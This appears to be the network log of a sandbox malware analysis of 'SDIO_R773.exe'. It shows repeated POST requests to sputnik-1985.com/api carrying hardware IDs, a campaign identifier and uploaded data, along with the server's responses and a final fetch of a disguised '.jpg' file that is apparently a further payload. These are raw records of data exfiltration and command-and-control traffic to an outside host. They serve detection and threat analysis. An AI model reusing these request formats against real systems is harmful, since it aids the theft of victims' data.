2025-01-11 10:56:12 UTC | 819 | IN | Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-01-11 10:56:12 UTC | 1369 | IN | Data Ascii: f.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cooki
2025-01-11 10:56:12 UTC | 1369 | IN | Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn
2025-01-11 10:56:12 UTC | 999 | IN | Data Ascii: oter-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &
2025-01-11 10:56:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49735 | 104.21.64.1 | 443 | 7528 | C:\Users\user\Desktop\SDIO_R773.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 10:56:13 UTC | 353 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 44
                                                                                                                                                                                                                                            Host: sputnik-1985.com
2025-01-11 10:56:13 UTC | 44 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 62 4c 37 4b 6b 2d 2d 30 32 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=BbL7Kk--02&j=
2025-01-11 10:56:13 UTC | 1122 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:13 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=3o9a94m7n0oj3ug004n5r22muh; expires=Wed, 07 May 2025 04:42:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xNmdtp1or6HJe5jqPtTV9K3uM4wgoh1X6kPvYm2O%2FzOWMSyY1HhmkSurSFRn22xL41MQBr44KZcc7AzTjprZMyqw%2BgcSPMqZGxN60uC1A%2BJDpIlB08cPKiGmETwQPtP11dYl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 90046103a828c358-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1648&rtt_var=628&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1033&delivery_rate=1729857&cwnd=155&unsent_bytes=0&cid=740f9ed7565b63ed&ts=510&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49736 | 104.21.64.1 | 443 | 7528 | C:\Users\user\Desktop\SDIO_R773.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 10:56:14 UTC | 365 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=K8TVJ8YTUGNJ
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 18124
                                                                                                                                                                                                                                            Host: sputnik-1985.com
2025-01-11 10:56:14 UTC | 15331 | OUT | Data Ascii:
--K8TVJ8YTUGNJ
Content-Disposition: form-data; name="hwid"

4D57480DA6ECFFD4E2FCF1EEA745798E
--K8TVJ8YTUGNJ
Content-Disposition: form-data; name="pid"

2
--K8TVJ8YTUGNJ
Content-Disposition: form-data; name="lid"

BbL7Kk--02
--K8TVJ8YTUGNJ
Con
2025-01-11 10:56:27 UTC | 1135 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:26 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=poqinmivl27ir64meje38dvqqm; expires=Wed, 07 May 2025 04:43:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z0gMAWU41aeR6Jn%2FX9loZWIxCX1ddZKJnv5ktZPgwq97Oi4pYM93HGNgolhvt5hDH%2BpoVAn8W1k%2BbthjKVpP%2B6%2B%2BTe6M37Zh3tqoCPUIxQ1K3P1pwE2U7%2BVxCY6L2m491utk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 9004610d2bd3c358-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1636&rtt_var=637&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2841&recv_bytes=19169&delivery_rate=1685912&cwnd=155&unsent_bytes=0&cid=4f6f2ec3194436b8&ts=12198&x=0"
2025-01-11 10:56:27 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-11 10:56:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49743 | 104.21.64.1 | 443 | 7528 | C:\Users\user\Desktop\SDIO_R773.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 10:56:27 UTC | 361 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=TWFBAMJXU
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8727
                                                                                                                                                                                                                                            Host: sputnik-1985.com
2025-01-11 10:56:27 UTC | 8727 | OUT | Data Ascii:
--TWFBAMJXU
Content-Disposition: form-data; name="hwid"

4D57480DA6ECFFD4E2FCF1EEA745798E
--TWFBAMJXU
Content-Disposition: form-data; name="pid"

2
--TWFBAMJXU
Content-Disposition: form-data; name="lid"

BbL7Kk--02
--TWFBAMJXU
Content-Disposi
2025-01-11 10:56:28 UTC | 1119 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:28 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=nu9f7vovhnikukveij6p6866v8; expires=Wed, 07 May 2025 04:43:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2FBugpGCWnyJ9goxeBhdUm5QQcPWIWpbOaWbA04345pIbLVNYbp3nOqWnxh0a5yVA9tFnqpgyGonJkjaPN3uWNWJVyyMkX8CdgGMBdNDdqxFKD0b052QlOaXGO2lqE4rF9yp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 9004615cef2cc358-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1619&rtt_var=618&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2840&recv_bytes=9746&delivery_rate=1755862&cwnd=155&unsent_bytes=0&cid=57ff7d5b036dc8fc&ts=506&x=0"
2025-01-11 10:56:28 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-11 10:56:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49744 | 104.21.64.1 | 443 | 7528 | C:\Users\user\Desktop\SDIO_R773.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 10:56:28 UTC | 370 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=IL6BMMWY71KX89XER
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 20428
                                                                                                                                                                                                                                            Host: sputnik-1985.com
2025-01-11 10:56:28 UTC | 15331 | OUT | Data Ascii: --IL6BMMWY71KX89XERContent-Disposition: form-data; name="hwid"4D57480DA6ECFFD4E2FCF1EEA745798E--IL6BMMWY71KX89XERContent-Disposition: form-data; name="pid"3--IL6BMMWY71KX89XERContent-Disposition: form-data; name="lid"BbL7Kk--02--IL
2025-01-11 10:56:28 UTC | 5097 | OUT | Data: [binary]
2025-01-11 10:56:29 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:29 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=nq5vui61vqfip1rmkdjr13rlhp; expires=Wed, 07 May 2025 04:43:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uzvtWa%2Fu0YeG9vfXGgfUrmos4%2FbN9kwwpadTBBwXl03HK9ZJr%2FQYj0rcUG6VJ8UnWzjV9iv5Jge7zPJLUJ3ljO2fAXkE9o8Zp0H7Efr%2B9fRXAvW2fT%2Bc%2B8O2uE6uUjoHKQM6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 90046163e9dd8ca1-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1936&min_rtt=1931&rtt_var=735&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21478&delivery_rate=1476985&cwnd=168&unsent_bytes=0&cid=2cfb432faa2e71ae&ts=628&x=0"
2025-01-11 10:56:29 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-11 10:56:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49745 | 104.21.64.1 | 443 | 7528 | C:\Users\user\Desktop\SDIO_R773.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 10:56:30 UTC | 365 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=5NLKGQ3BJ2AK5
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 1234
                                                                                                                                                                                                                                            Host: sputnik-1985.com
2025-01-11 10:56:30 UTC | 1234 | OUT | Data Ascii: --5NLKGQ3BJ2AK5Content-Disposition: form-data; name="hwid"4D57480DA6ECFFD4E2FCF1EEA745798E--5NLKGQ3BJ2AK5Content-Disposition: form-data; name="pid"1--5NLKGQ3BJ2AK5Content-Disposition: form-data; name="lid"BbL7Kk--02--5NLKGQ3BJ2AK5
2025-01-11 10:56:30 UTC | 1124 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:30 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=o0erj456ab29ku5lqrmhn9gbge; expires=Wed, 07 May 2025 04:43:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfaI%2FmaSEmESV7Tdw3WqRouOYj%2BbzNY%2BZjAs5KNRUZL6bkSQu5TGlyzd20f4qLhgYh3ll%2BDSLpBlet5jcKGCigK9nbmKIvwowJmHdzMOOIwOSrcpafpiRKbvanh6fjV0Y0IC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 9004616ddd73de95-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1605&rtt_var=606&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2235&delivery_rate=1799137&cwnd=243&unsent_bytes=0&cid=c387b8a553c36f58&ts=435&x=0"
2025-01-11 10:56:30 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-11 10:56:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49746 | 104.21.64.1 | 443 | 7528 | C:\Users\user\Desktop\SDIO_R773.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 10:56:31 UTC | 367 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=53G1TXEPG3U24
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 589917
                                                                                                                                                                                                                                            Host: sputnik-1985.com
2025-01-11 10:56:31 UTC | 15331 | OUT | Data Raw: 2d 2d 35 33 47 31 54 58 45 50 47 33 55 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 35 37 34 38 30 44 41 36 45 43 46 46 44 34 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45 0d 0a 2d 2d 35 33 47 31 54 58 45 50 47 33 55 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 33 47 31 54 58 45 50 47 33 55 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 32 0d 0a 2d 2d 35 33 47 31 54 58 45 50 47 33 55 32 34 0d
                                                                                                                                                                                                                                            Data Ascii: --53G1TXEPG3U24Content-Disposition: form-data; name="hwid"4D57480DA6ECFFD4E2FCF1EEA745798E--53G1TXEPG3U24Content-Disposition: form-data; name="pid"1--53G1TXEPG3U24Content-Disposition: form-data; name="lid"BbL7Kk--02--53G1TXEPG3U24
2025-01-11 10:56:33 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:33 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=jddtql0bnpa8k33qt9av3nd252; expires=Wed, 07 May 2025 04:43:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qza4Xr7mo%2F7C10nsE1FZ1KJhcmgbtC1fzLoy641mSbvKf%2FtDUQiAdFqTlXZS1whR4ospJGhqJqYnB4cfmdJoT6KMuy7vSG8LexZRpjJ6IVNp3Rtoy4vxBhc9u3It%2Fh%2FMb8%2BU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 900461764826c358-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1675&rtt_var=631&sent=350&recv=606&lost=0&retrans=0&sent_bytes=2839&recv_bytes=592592&delivery_rate=1730883&cwnd=155&unsent_bytes=0&cid=3dc73bf906c7bcff&ts=1950&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49747 | 104.21.64.1 | 443 | 7528 | C:\Users\user\Desktop\SDIO_R773.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 10:56:34 UTC | 353 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 79
                                                                                                                                                                                                                                            Host: sputnik-1985.com
2025-01-11 10:56:34 UTC | 79 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 62 4c 37 4b 6b 2d 2d 30 32 26 6a 3d 26 68 77 69 64 3d 34 44 35 37 34 38 30 44 41 36 45 43 46 46 44 34 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45
                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=BbL7Kk--02&j=&hwid=4D57480DA6ECFFD4E2FCF1EEA745798E
2025-01-11 10:56:34 UTC | 1118 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:34 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=glrfk5b9c0b9fobohdcefs2ok0; expires=Wed, 07 May 2025 04:43:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DdZMPEMNkWdHQbyifwx9pzmXPUAZ7F448VEMYwyzj9RcMrTY7ku3MTRDwLBmG2sD%2BXVBbhPrf5nTSc9mLhLS1BHwFzSZeEEMEDrbL7WHs2sbBj0pudSgtWUpkiZB9CtUPZjK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 900461854dff7c6a-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1962&rtt_var=740&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1068&delivery_rate=1475492&cwnd=218&unsent_bytes=0&cid=02b304c69de5b9e2&ts=462&x=0"
2025-01-11 10:56:34 UTC | 251 | IN | Data Raw: 66 38 0d 0a 6f 61 76 66 55 35 4f 33 67 61 6b 77 55 5a 2b 50 6f 37 51 4f 6b 77 7a 6e 54 53 34 56 37 31 6c 4c 68 78 50 73 4e 57 48 32 4f 53 6a 36 30 50 30 6d 73 59 32 6a 77 55 51 6c 37 2f 79 5a 36 43 48 50 49 35 41 36 57 54 75 4c 4b 79 54 33 63 59 4e 4e 54 35 56 57 52 66 32 45 72 44 44 2f 36 36 37 50 57 51 32 77 2b 39 6e 44 4f 71 55 39 6c 69 73 61 49 59 45 34 4a 76 42 38 6e 45 63 56 68 31 41 5a 2f 59 53 38 4f 2f 4c 5a 37 38 78 63 49 71 75 39 6c 2b 74 73 38 6d 4b 4a 4b 46 77 37 68 53 6b 73 75 47 47 41 58 67 53 50 42 45 2f 47 33 4b 31 71 70 73 54 74 77 51 6c 6a 2b 62 32 58 33 6d 44 31 5a 6f 34 2f 52 47 79 56 49 44 69 68 59 4a 67 49 57 59 4a 41 55 64 75 65 73 47 53 31 30 2b 32 55 41 58 4f 7a 72 63 58 41 4c 4b 6b 38 79 32 39 4c 4e 39 56 70 4e 74 6f
                                                                                                                                                                                                                                            Data Ascii: f8oavfU5O3gakwUZ+Po7QOkwznTS4V71lLhxPsNWH2OSj60P0msY2jwUQl7/yZ6CHPI5A6WTuLKyT3cYNNT5VWRf2ErDD/667PWQ2w+9nDOqU9lisaIYE4JvB8nEcVh1AZ/YS8O/LZ78xcIqu9l+ts8mKJKFw7hSksuGGAXgSPBE/G3K1qpsTtwQlj+b2X3mD1Zo4/RGyVIDihYJgIWYJAUduesGS10+2UAXOzrcXALKk8y29LN9VpNto
2025-01-11 10:56:34 UTC | 3 | IN | Data Raw: 3d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: =
2025-01-11 10:56:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49748 | 162.125.66.18 | 443 | 7528 | C:\Users\user\Desktop\SDIO_R773.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 10:56:35 UTC | 290 | OUT | GET /scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjirjyzys&st=8tyyz5o7&dl=1 HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
